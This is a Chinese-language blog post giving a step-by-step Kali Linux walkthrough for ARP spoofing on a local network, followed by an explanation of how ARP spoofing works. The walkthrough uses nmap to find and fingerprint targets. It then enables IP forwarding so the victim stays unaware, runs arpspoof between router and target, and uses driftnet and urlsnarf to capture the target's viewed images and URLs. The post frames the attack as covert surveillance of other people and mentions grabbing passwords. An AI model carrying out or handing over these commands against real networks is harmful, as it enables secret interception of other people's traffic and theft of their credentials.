欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

ARP欺骗

程序员文章站 2022-05-16 21:26:10
...

我们可以通过arp欺骗,监听获取到局域网中其他电脑网络上浏览的图片或者一些网站痕迹,甚至能够抓住目标的某些上网密码。

前期准备:1:kali系统的操作机一台(所需软件全在kali里了)

1:查看kali本机的IP,以及目标机的地址(这里目标机就是我自己的靶机,所以直接自己看了):

ifconfig


ARP欺骗ARP欺骗

2:如果并不知道目标的IP地址,我们也可以用nmap 这款扫描工具来对本局域网内的电脑尽心扫描:

nmap -sP 192.168.43.0/24


ARP欺骗

然后就可以看到在本网内的每台接网机器了。

此时如果你依然不知道目标为哪一台电脑,你可以对IP继续扫描,可以看到系统等等详细信息:

nmap -O 192.168.43.117(目标IP)

ARP欺骗

3:此时你已经准确的获得了目标的IP地址,在进行ARP欺骗之前还要更改一下kali中ipv4这个文件,将其的值改为1,就可以转发那你所收到的包了,这能保证目标主机不能发现自己被监视了:

echo 1 >> /proc/sys/net/ipv4/ip_forward

ARP欺骗
4:此时准备工作全部完成可以进行最重要的一步了:

arpspoof -i eth0 -t 192.168.43.1 (路由器IP) 192.168.43.177(目标IP)

ARP欺骗

5:此时已经进行了ARP的欺骗,我们可以获取目标浏览过的图片了:

driftnet -i eth0


ARP欺骗

6(1): 现在目标机器还在毫无察觉的浏览网页,却不知道已经被你监视了:

ARP欺骗


ARP欺骗

(2):我们此时也可以对目标进行访问网页的拦截,可以看到目标浏览过的网页:

urlsnarf -i eth0

ARP欺骗

这样就可以进行监视了;

ARP原理详解:

任何东西都有它的两面性,在黑客的手中,嗅探器就变成了一个黑客利器,如利用ARP欺骗手段,很多攻击方式都要涉及到arp欺骗,如会话劫持和ip欺骗。首先要把网络置于混杂模式,再通过欺骗抓包的方式来获取目标主机的pass包,当然得在同一个交换环境下,也就是要先取得目标服务器的同一网段的一台服务器。 Arp是什么?arp是一种将ip转化成以ip对应的网卡的物理地址的一种协议,或者说ARP协议是一种将ip地址转化成MAC地址的一种协议,它靠维持在内存中保存的一张表来使ip得以在网络上被目标机器应答。ARP就是IP地址与物理之间的转换,当你在传送数据时,IP包里就有源IP地址、源MAC地址、目标IP地址,如果在ARP表中有相对应的MAC地址,那么它就直接访问,反之,它就要广播出去,对方的IP地址和你发出的目标IP地址相同,那么对方就会发一个MAC地址给源主机。而ARP欺骗就在此处开始,侵略者若接听到你发送的IP地址,那么,它就可以仿冒目标主机的IP地址,然后返回自己主机的MAC地址给源主机。因为源主机发送的IP包没有包括目标主机的MAC地址,而ARP表里面又没有目标IP地址和目标MAC地址的对应表。所以,容易产生ARP欺骗。例如:我们假设有三台主机A,B,C位于同一个交换式局域网中,监听者处于主机A,而主机B,C正在通信。现在A希望能嗅探到B->C的数据, 于是A就可以伪装成C对B做ARP欺骗——向B发送伪造的ARP应答包,应答包中IP地址为C的IP地址而MAC地址为A的MAC地址。 这个应答包会刷新B的ARP缓存,让B认为A就是C,说详细点,就是让B认为C的IP地址映射到的MAC地址为主机A的MAC地址。 这样,B想要发送给C的数据实际上却发送给了A,就达到了嗅探的目的。我们在嗅探到数据后,还必须将此数据转发给C, 这样就可以保证B,C的通信不被中断。


相关标签: ARP